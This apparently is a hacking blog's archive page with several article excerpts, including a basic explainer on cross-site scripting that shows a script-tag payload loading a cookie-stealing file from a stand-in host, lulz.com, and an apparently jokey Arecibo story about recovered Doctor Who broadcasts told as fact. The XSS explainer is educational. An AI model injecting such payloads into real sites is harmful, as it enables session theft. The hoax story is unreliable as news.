As the light of the 20th century was peeking over the horizon, a young physicist by the name of Max Planck was taking to heart some career advice he had received while he attended Munich University in Germany. With the recent discovery of thermodynamics, there wasn’t much left in physics to know, or so his adviser thought. Hindsight is indeed 20/20.
It turns out that Planck was an expert at thermodynamics. Having mastered the subject gave him some leverage to use against a growing group of physicists known as atomists who were using statistical models along with so called ‘atoms’ to predict experimental outcomes. Atomists believed that matter was composed of discrete units. Planck believed the world was continuous and could not be divided into any type of discrete component. And he would draw the second law of thermodynamics from his holster and put this atom idea in the clay.
While searching for signs of Dalek activity in the vast depths of outer space, the Arecibo Observatory in Puerto Rico stumbled across a most interesting find. They were receiving modulated radio signals emanating from an invisible object about 25 light years away. The signals were all in the VHF band between 41 and 68 MHz. After a applying a little amplification and some wibbly wobbly timey wimey enhancements, it became clear what the signals were – 50 year old terrestrial television broadcasts. The site takes a minute or so to load due to the traffic its getting.
[Dr. Venn], the radio astronomer who discovered the signals, was able to talk NASA into pointing the Hubble Space Telescope in the direction of the now officially named “Bounce Anomaly”, but was unable to see anything. Meanwhile, a BBC team has been working with [Dr. Venn] to recover the 50 year old signals and is attempting to reconstruct entire broadcasts – some of which are the very first Dr. Who episodes.
In 2011, a group of hackers known as Lulzsec went on a two month rampage hacking into dozens of websites including those owned by FOX, PBS, the FBI, Sony and many others. The group was eventually caught and questioned in how they were able to pull off so many hacks. It would be revealed that none of the hackers actually knew each other in real life. They didn’t even know each other’s real names. They only spoke in secluded chat rooms tucked away in a dark corner of the internet and knew each other by their aliases – [tFlow], [Sabu], [Topiary], [Kayla], to name a few. Each had their own special skill, and when combined together they were a very effective team of hackers.
It was found that they used 3 primary methods of cracking into websites – SQL injection, cross-site scripting and remote file inclusion. We gave a basic overview of how a SQL injection attack works in the previous article of this series. In this article we’re going to do the same with cross-site scripting, or XSS for short. SQL injection has been called the biggest vulnerability in the history of mankind from a potential data loss perspective. Cross-site scripting comes in as a close second. Let’s take a look at how it works.
Let us suppose that you wanted to sell an Arduino on your favorite buy-and-sell auction website. The first thing to do would be to log into the server. During this process, a cookie from that server would be stored on your computer. Anytime you load the website in your browser, it will send that cookie along with your HTTP request to the server, letting it know that it was you and saving you from having to log in every time you visit. It is this cookie that will become the target of our attack.
You would then open up some type of window that would allow you to type in a description of your Arduino that potential buyers could read. Let’s imagine you say something like:
Arduino Uno in perfect condition. New in Box. $15 plus shipping.
You would save your description and it would be stored on a database in the server. So far, there is nothing out of the ordinary or suspicious about our scenario at all. But let’s take a look at what happens when a potential buyer logs into the server. They’re in need of an Arduino and see your ad that you just posted. What does their browser see when they load your post?
Arduino Uno in perfect condition. <b>New in Box</b>. $15 plus shipping.
Whether you realize it or not, you just ran HTML code (in the form of the bold tags) on their computer, albeit harmless code that does what both the buyer and seller want – to highlight a specific selling point of the product. But what other code can you run? Can you run code that might do something the buyer surely does not want? Code that will run on any and every computer that loads the post? Not only should you be able to see where we’re going with this, you should also be able to see the scope of the problem and just how dangerous it can be.
Now let us imagine a Lulzsec hacker is out scoping for some much needed lulz. He runs across your post and nearly instantly recognizes that you were able to run HTML code on his computer. He then makes a selling ad on the website:
Lot of 25 Raspberry Pi Zeros - New in Box - < script src="http://lulz.com/email_me_your_cookie.js" ></script> - $100, free shipping.
Now as soon as someone opens up the hacker’s ad, the script section will load up the malicious off-site code and steal the victim’s session cookie. Normally, only the website specified in a cookie has access to that cookie. Here, since the malicious code was served from the auction website’s server, the victim’s browser has no problem with sending the auction website’s cookie. Now the hacker can load the cookie into his browser to impersonate the victim, allowing the hacker access to everything his victim has access to.
With a little imagination, you can see just how far you can reach with a cross-site scripting attack. You can envision a more targeted attack with a hacker trying to get inside a large company like Intel by exploiting a flawed competition entry process. The hacker visits the Intel Edison competition entry page and sees that he can run code in the application submission form. He knows someone on the Intel intranet will likely read his application and guesses it will be done via a browser. His XSS attack will run as soon as his entry is opened by the unsuspecting Intel employee.
This kind of attack can be run in any user input that allows containing code to be executed on another computer. Take a comment box for instance. Type in some type of < script >evil</script> into a comment box and it will load on every computer that loads that page. [Samy Kamkar] used a similar technique to pull off his famous Myspace worm as we talked about in the beginning of the previous article in this series. XSS, at one time, could even have been done with images.
Preventing XSS attacks
There are people here that are far more knowledgeable than I on these type of hacking techniques. It was my hope to give the average hardware hacker a basic understanding of XSS and how it works. We welcome comments from those with a more advanced knowledge of cross-site scripting and other website hacking techniques that would help to deepen everyone’s understanding of these important subjects.
Retro gaming consoles exploded with the introduction of the Raspberry Pi and other similar single-board Linux computers. They all work the same way in that they emulate the original game console hardware with software. The game ROM is then dumped to a file and will play like the original. While this works just fine for the vast majority of us who want to get a dose of nostalgia as we chase the magic 1-up mushroom, gaming purists are not satisfied. They can tell the subtle differences between emulation and real hardware. And this is where our story begins.
Meet the Coleco Chameleon. What appears to be just another run-of-the-mill retro gaming console is not what you think. It has an FPGA core that replicates the actual hardware, to the delight of hardcore retro game enthusiasts around the world. To get it to the masses, they started an ambitious 2 million US dollar Indiegogo campaign, which has unfortunately come to a screeching halt.
This scam is clearly busted. However, the idea of reconstructing old gaming console hardware in an FPGA is a viable proposition, and there is demand for such a device from gaming enthusiasts. We can only hope that the owners of the Coleco Chameleon Kickstarter campaign meant well and slipped up trying to meet demand. If they can make a real piece of hardware, it would be welcomed.
As the year of 2005 was drawing to a close, a website known as Myspace was basking in popularity. With millions of users, the site was the most popular social networking site in the world. It was unique in that it let users use HTML code to customize their Myspace page. Most of us, c’mon…admit it….had a Myspace page. The coding part was fun! But not everything was changeable with code. You could only upload up to 12 images and the Relationship Status drop-down menu only had a few options to choose from. These limitations did not sit well with [Samy Kamkar], a 19 year old hacker out of Los Angeles.
It didn’t take [Samy] long to figure out how to trick the site to let him upload more images and change his relationship status to a customized “in a hot relationship”. After hoodwinking the Myspace site with some simple hacks, he realized he could do just about anything he wanted to with it. And this is where things get interesting. It took just over a week to develop a script that would force people who visited his page to add him as a friend. But that wasn’t enough. He then programmed the script to copy itself onto the visitor’s page. [Samy] had developed a self-propagating worm.
The script went live as [Samy] went to bed. He woke up the next morning with 200 friends requests. An hour later the number had doubled. [Samy] got worried and sent an anonymous email to the webmaster warning of the worm. It was ignored. By 1:30PM that day, he had over 6,000 friends request. And like any good hacker worth his weight in floppy drives, his sense of humor had him program the script to also add his name to each visitor’s Heroes List. This angered many people, who deleted him from their page, only to get reinfected moments later when they visited another (infected) page.
[Samy’s] script was raging out of control. As the evening closed in, his friends count had reached 919,664. It would top the 1 million mark just before Myspace took their servers offline to figure out what was going on. Two hours later, the site was back up. [Samy’s] profile page had been deleted.
[Samy] had used a technique known as cross-site scripting (XSS) to pull off his hack. We’ll touch on XSS in a later article. For now, we’re going to stick to the basics – proper passwords and SQL Injection.
When we think of the average hot rodder, we think of guys and gals that love anything on four wheels. They’re good with hand tools, fabrication and know the ins and outs of the internal combustion engine. Their tools of the trade are welders, grinders and boxed-end wrenches. But their knowledge of electric circuits doesn’t go beyond wiring up a 12 volt DC tail light. On the surface, the role of a hot rodder would seem quite different from that of a hardware hacker. But if you abstract what they do, you find that they take machines and modify their design to make them do something more than they were originally designed to do. When viewed in this light, hot rodders are hackers. Continue reading “Worlds Collide: Hot Rodders and Hackers”→
[Louise] tried out her new E3D Cyclops dual extrusion system by printing a superb model dragon. The piece was sculpted in Blender, stands 13cm tall and can be made without supports. It’s an impressive piece of artwork that reflects the maker’s skill, dedication and hard work. She shared her creation on the popular Thingiverse website which allows others to download the file for use on their own 3D printer. You can imagine her surprise when she stumbled upon her work being sold on eBay.
It turns out that the owner of the eBay store is not just selling [Louise]’s work, he’s selling thousands of other models taken from the Thingiverse site. This sketchy and highly unethical business model has not gone unnoticed, and several people have launched complaints to both Thingiverse and eBay. Now, there are lots of things to talk about here, but the 800 pound high voltage transformer in the room is the legality of the whole thing. What he’s doing might be unethical, but is it illegal?
When [Louise] politely asked the eBay store owner to remove her work, he responded with:
“When you uploaded your items onto Thingiverse for mass distribution, you lost all rights to them whatsoever. They entered what is known in the legal world as “public domain”. The single exception to public domain rules are original works of art. No court in the USA has yet ruled a CAD model an original work or art.”
Most of the uploaded CAD models on Thingiverse are done under the Creative Commons license, which is pretty clear in its assertion that anyone can profit from the work. This would seem to put the eBay store owner in the clear for selling the work, but it should be noted that he’s not properly attributing the work to the original creator. There are other derivatives of the license, some of which prohibit commercial use of the work. In these cases, the eBay store owner would seem to be involved in an obvious violation of the license.
There are also questions stirring with his use of images. He’s not taking the CAD model and making his own prints for images. He lifting the images of the prints from the Thingiverse site along with the CAD files. It’s a literal copy/paste business model.
With that said, the eBay store owner makes a fairly solid argument in the comments section of the post that broke the news. Search for the poster named “JPL” and the giant brick of text to read it. He argues that the Thingiverse non-commercial license is just lip service and has no legal authority. One example of this is how they often provide links to companies that will print a CAD design on the same page of a design that’s marked as non-commercial. He sums up one of many good points with the quote below:
“While we could list several other ways Thingiverse makes (money), any creator should get the picture by now-Thingiverse exists to make Stratasys (money) off of creators’ designs in direct violation of its very own “non-commercial” license. If a creator is OK with a billion-dollar Israeli company monetizing his/her designs, but hates on a Philly startup trying to make ends-meet, then they have a very strange position indeed.”
OK Hackaday readers, you have heard both sides of the issue. Here’s the question(s):
1. Is the eBay seller involved in illegal activity?
2. Can he change his approach to stay within the limits of the license? For instance, what if he credits the original maker on the sale page?
3. How would you feel if you found your CAD file for sale on his eBay store?